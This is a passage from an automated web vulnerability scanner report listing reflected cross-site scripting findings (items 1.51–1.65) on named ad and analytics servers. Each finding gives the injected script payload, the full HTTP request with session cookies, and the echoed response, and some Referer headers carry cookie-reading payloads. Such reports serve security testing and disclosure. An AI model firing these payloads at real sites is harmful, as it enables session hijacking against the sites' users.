1.51. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=160x600 [noperf parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=160x600

Issue detail

The value of the noperf request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6861"><script>alert(1)</script>ad0c3bcb1e7 was submitted in the noperf parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794/0/-1/size=160x600;noperf=1;alias=93220029;cfp=1;noaddonpl=y;kvpg=bloggingstocks;kvugc=0;kvmn=93220029;target=_blank;aduho=-360;grp=24244844;misc=24244844c6861"><script>alert(1)</script>ad0c3bcb1e7 HTTP/1.1
Host: at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.bloggingstocks.com/?f020e%22-alert(document.cookie)-%22014356e96ab=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=; CfP=1; JEB2=4D4EEFDF6E651A440C6EAF39F00070C8; AxData=1#60488; Axxd=1; ATTAC=a3ZzZWc9OTk5OTk6NTAwMTI6NTExMzM6NTExODQ6NTI2MTE6NTI2MTU6NTI5NDc6NTM1NzU6NTQ0OTA6NTQ4OTg6NTQ5Mzg6NTQ5NTQ6NTY0MzI6NTY1NTU6NTY3MzI6NTY3MzM6NTY3ODA6NjA0MjU6NjA0ODg6NjA0OTA6NjA0OTE6NjA1MDY6NjA3Mzk6NjE2NzQ6NTAyMTM6NTAyMjA6NTAyMDQ6NTAyMzc6NTAyMjg6NTAyMjk=

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 367

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/size=160x600;noperf=1;alias=93220029;cfp=1;noaddonpl=y;kvpg=bloggingstocks;kvugc=0;kvmn=93220029;target=_blank;aduho=-360;grp=24244844;misc=24244844c6861"><script>alert(1)</script>ad0c3bcb1e7;adiframe=y">
...[SNIP]...

1.52. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48ed2"><script>alert(1)</script>a7413131d8b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe48ed2"><script>alert(1)</script>a7413131d8b/3.0/5113.1/221794/0/-1/size=300x250 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4D4EEFDF6E651A440C6EAF39F00070C8; ATTAC=a3ZzZWc9OTk5OTk6NTAwMTI6NTExMzM6NTExODQ6NTI2MTE6NTI2MTU6NTI5NDc6NTM1NzU6NTQ0OTA6NTQ4OTg6NTQ5Mzg6NTQ5NTQ6NTY0MzI6NTY1NTU6NTY3MzI6NTY3MzM6NTY3ODA6NjA0MjU6NjA0ODg6NjA0OTA6NjA0OTE6NjA1MDY6NjA3Mzk6NjE2NzQ6NTAyMTM6NTAyMjA6NTAyMDQ=; CfP=1; ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 229

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn48ed2"><script>alert(1)</script>a7413131d8b/3.0/5113.1/221794/0/-1/size=300x250;adiframe=y">
...[SNIP]...

1.53. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a33b"><script>alert(1)</script>d2b240b8cbd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.08a33b"><script>alert(1)</script>d2b240b8cbd/5113.1/221794/0/-1/size=300x250 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4D4EEFDF6E651A440C6EAF39F00070C8; ATTAC=a3ZzZWc9OTk5OTk6NTAwMTI6NTExMzM6NTExODQ6NTI2MTE6NTI2MTU6NTI5NDc6NTM1NzU6NTQ0OTA6NTQ4OTg6NTQ5Mzg6NTQ5NTQ6NTY0MzI6NTY1NTU6NTY3MzI6NTY3MzM6NTY3ODA6NjA0MjU6NjA0ODg6NjA0OTA6NjA0OTE6NjA1MDY6NjA3Mzk6NjE2NzQ6NTAyMTM6NTAyMjA6NTAyMDQ=; CfP=1; ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 229

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.08a33b"><script>alert(1)</script>d2b240b8cbd/5113.1/221794/0/-1/size=300x250;adiframe=y">
...[SNIP]...

1.54. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf8ec"><script>alert(1)</script>b39abb6cf7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1cf8ec"><script>alert(1)</script>b39abb6cf7/221794/0/-1/size=300x250 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4D4EEFDF6E651A440C6EAF39F00070C8; ATTAC=a3ZzZWc9OTk5OTk6NTAwMTI6NTExMzM6NTExODQ6NTI2MTE6NTI2MTU6NTI5NDc6NTM1NzU6NTQ0OTA6NTQ4OTg6NTQ5Mzg6NTQ5NTQ6NTY0MzI6NTY1NTU6NTY3MzI6NTY3MzM6NTY3ODA6NjA0MjU6NjA0ODg6NjA0OTA6NjA0OTE6NjA1MDY6NjA3Mzk6NjE2NzQ6NTAyMTM6NTAyMjA6NTAyMDQ=; CfP=1; ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 228

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1cf8ec"><script>alert(1)</script>b39abb6cf7/221794/0/-1/size=300x250;adiframe=y">
...[SNIP]...

1.55. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 984e3"><script>alert(1)</script>381ff05b531 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794984e3"><script>alert(1)</script>381ff05b531/0/-1/size=300x250 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4D4EEFDF6E651A440C6EAF39F00070C8; ATTAC=a3ZzZWc9OTk5OTk6NTAwMTI6NTExMzM6NTExODQ6NTI2MTE6NTI2MTU6NTI5NDc6NTM1NzU6NTQ0OTA6NTQ4OTg6NTQ5Mzg6NTQ5NTQ6NTY0MzI6NTY1NTU6NTY3MzI6NTY3MzM6NTY3ODA6NjA0MjU6NjA0ODg6NjA0OTA6NjA0OTE6NjA1MDY6NjA3Mzk6NjE2NzQ6NTAyMTM6NTAyMjA6NTAyMDQ=; CfP=1; ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 229

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794984e3"><script>alert(1)</script>381ff05b531/0/-1/size=300x250;adiframe=y">
...[SNIP]...

1.56. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7efe"><script>alert(1)</script>184e0a940d6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794/0e7efe"><script>alert(1)</script>184e0a940d6/-1/size=300x250 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4D4EEFDF6E651A440C6EAF39F00070C8; ATTAC=a3ZzZWc9OTk5OTk6NTAwMTI6NTExMzM6NTExODQ6NTI2MTE6NTI2MTU6NTI5NDc6NTM1NzU6NTQ0OTA6NTQ4OTg6NTQ5Mzg6NTQ5NTQ6NTY0MzI6NTY1NTU6NTY3MzI6NTY3MzM6NTY3ODA6NjA0MjU6NjA0ODg6NjA0OTA6NjA0OTE6NjA1MDY6NjA3Mzk6NjE2NzQ6NTAyMTM6NTAyMjA6NTAyMDQ=; CfP=1; ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 229

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794/0e7efe"><script>alert(1)</script>184e0a940d6/-1/size=300x250;adiframe=y">
...[SNIP]...

1.57. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c147"><script>alert(1)</script>c56f6924a19 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794/0/-17c147"><script>alert(1)</script>c56f6924a19/size=300x250 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4D4EEFDF6E651A440C6EAF39F00070C8; ATTAC=a3ZzZWc9OTk5OTk6NTAwMTI6NTExMzM6NTExODQ6NTI2MTE6NTI2MTU6NTI5NDc6NTM1NzU6NTQ0OTA6NTQ4OTg6NTQ5Mzg6NTQ5NTQ6NTY0MzI6NTY1NTU6NTY3MzI6NTY3MzM6NTY3ODA6NjA0MjU6NjA0ODg6NjA0OTA6NjA0OTE6NjA1MDY6NjA3Mzk6NjE2NzQ6NTAyMTM6NTAyMjA6NTAyMDQ=; CfP=1; ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 229

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794/0/-17c147"><script>alert(1)</script>c56f6924a19/size=300x250;adiframe=y">
...[SNIP]...

1.58. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30bcd"><script>alert(1)</script>adc7d40215f was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794/0/-1/size30bcd"><script>alert(1)</script>adc7d40215f=300x250 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4D4EEFDF6E651A440C6EAF39F00070C8; ATTAC=a3ZzZWc9OTk5OTk6NTAwMTI6NTExMzM6NTExODQ6NTI2MTE6NTI2MTU6NTI5NDc6NTM1NzU6NTQ0OTA6NTQ4OTg6NTQ5Mzg6NTQ5NTQ6NTY0MzI6NTY1NTU6NTY3MzI6NTY3MzM6NTY3ODA6NjA0MjU6NjA0ODg6NjA0OTA6NjA0OTE6NjA1MDY6NjA3Mzk6NjE2NzQ6NTAyMTM6NTAyMjA6NTAyMDQ=; CfP=1; ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 229

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/size30bcd"><script>alert(1)</script>adc7d40215f=300x250;adiframe=y">
...[SNIP]...

1.59. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9149d"><script>alert(1)</script>622ffc05fe8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794/0/-1/size=300x250?9149d"><script>alert(1)</script>622ffc05fe8=1 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4D4EEFDF6E651A440C6EAF39F00070C8; ATTAC=a3ZzZWc9OTk5OTk6NTAwMTI6NTExMzM6NTExODQ6NTI2MTE6NTI2MTU6NTI5NDc6NTM1NzU6NTQ0OTA6NTQ4OTg6NTQ5Mzg6NTQ5NTQ6NTY0MzI6NTY1NTU6NTY3MzI6NTY3MzM6NTY3ODA6NjA0MjU6NjA0ODg6NjA0OTA6NjA0OTE6NjA1MDY6NjA3Mzk6NjE2NzQ6NTAyMTM6NTAyMjA6NTAyMDQ=; CfP=1; ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 232

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/size=300x250?9149d"><script>alert(1)</script>622ffc05fe8=1;adiframe=y">
...[SNIP]...

1.60. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [noperf parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of the noperf request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c98c6"><script>alert(1)</script>3c3af206613 was submitted in the noperf parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794/0/-1/size=300x250;noperf=1;alias=93305907;cfp=1;noaddonpl=y;kvpg=bloggingstocks;kvugc=0;kvmn=93305907;target=_blank;aduho=-360;grp=24244844;misc=24244844c98c6"><script>alert(1)</script>3c3af206613 HTTP/1.1
Host: at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.bloggingstocks.com/?f020e%22-alert(document.cookie)-%22014356e96ab=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=; CfP=1; JEB2=4D4EEFDF6E651A440C6EAF39F00070C8; AxData=1#60488; Axxd=1; ATTAC=a3ZzZWc9OTk5OTk6NTAwMTI6NTExMzM6NTExODQ6NTI2MTE6NTI2MTU6NTI5NDc6NTM1NzU6NTQ0OTA6NTQ4OTg6NTQ5Mzg6NTQ5NTQ6NTY0MzI6NTY1NTU6NTY3MzI6NTY3MzM6NTY3ODA6NjA0MjU6NjA0ODg6NjA0OTA6NjA0OTE6NjA1MDY6NjA3Mzk6NjE2NzQ6NTAyMTM6NTAyMjA6NTAyMDQ6NTAyMzc6NTAyMjg6NTAyMjk=

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 367

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/size=300x250;noperf=1;alias=93305907;cfp=1;noaddonpl=y;kvpg=bloggingstocks;kvugc=0;kvmn=93305907;target=_blank;aduho=-360;grp=24244844;misc=24244844c98c6"><script>alert(1)</script>3c3af206613;adiframe=y">
...[SNIP]...

1.61. http://b.scorecardresearch.com/beacon.js [c1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 3e4b0<script>alert(1)</script>3fe39883e3 was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=83e4b0<script>alert(1)</script>3fe39883e3&c2=3005693&c3=1&c4=http%3A%2F%2Fwww.electronista.com%2F&c5=&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 13 Feb 2011 20:36:59 GMT
Date: Sun, 06 Feb 2011 20:36:59 GMT
Connection: close
Content-Length: 3608

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
MSCORE.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"83e4b0<script>alert(1)</script>3fe39883e3", c2:"3005693", c3:"1", c4:"http://www.electronista.com/", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

1.62. http://b.scorecardresearch.com/beacon.js [c10 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload 3ded5<script>alert(1)</script>e6bec28e3dd was submitted in the c10 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693&c3=1&c4=http%3A%2F%2Fwww.electronista.com%2F&c5=&c6=&c10=3ded5<script>alert(1)</script>e6bec28e3dd&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 13 Feb 2011 20:37:01 GMT
Date: Sun, 06 Feb 2011 20:37:01 GMT
Connection: close
Content-Length: 3609

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"3005693", c3:"1", c4:"http://www.electronista.com/", c5:"", c6:"", c10:"3ded5<script>alert(1)</script>e6bec28e3dd", c15:"", c16:"", r:""});

1.63. http://b.scorecardresearch.com/beacon.js [c15 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 60671<script>alert(1)</script>5eb3a0cba51 was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693&c3=1&c4=http%3A%2F%2Fwww.electronista.com%2F&c5=&c6=&c10=&c15=60671<script>alert(1)</script>5eb3a0cba51 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 13 Feb 2011 20:37:02 GMT
Date: Sun, 06 Feb 2011 20:37:02 GMT
Connection: close
Content-Length: 3609

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
OMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"3005693", c3:"1", c4:"http://www.electronista.com/", c5:"", c6:"", c10:"", c15:"60671<script>alert(1)</script>5eb3a0cba51", c16:"", r:""});

1.64. http://b.scorecardresearch.com/beacon.js [c2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload d53a2<script>alert(1)</script>9cc82d916a8 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693d53a2<script>alert(1)</script>9cc82d916a8&c3=1&c4=http%3A%2F%2Fwww.electronista.com%2F&c5=&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 13 Feb 2011 20:37:00 GMT
Date: Sun, 06 Feb 2011 20:37:00 GMT
Connection: close
Content-Length: 3609

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
unction(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"3005693d53a2<script>alert(1)</script>9cc82d916a8", c3:"1", c4:"http://www.electronista.com/", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

1.65. http://b.scorecardresearch.com/beacon.js [c3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 68b81<script>alert(1)</script>efcbb2330ca was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693&c3=168b81<script>alert(1)</script>efcbb2330ca&c4=http%3A%2F%2Fwww.electronista.com%2F&c5=&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 13 Feb 2011 20:37:00 GMT
Date: Sun, 06 Feb 2011 20:37:00 GMT
Connection: close
Content-Length: 3609

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
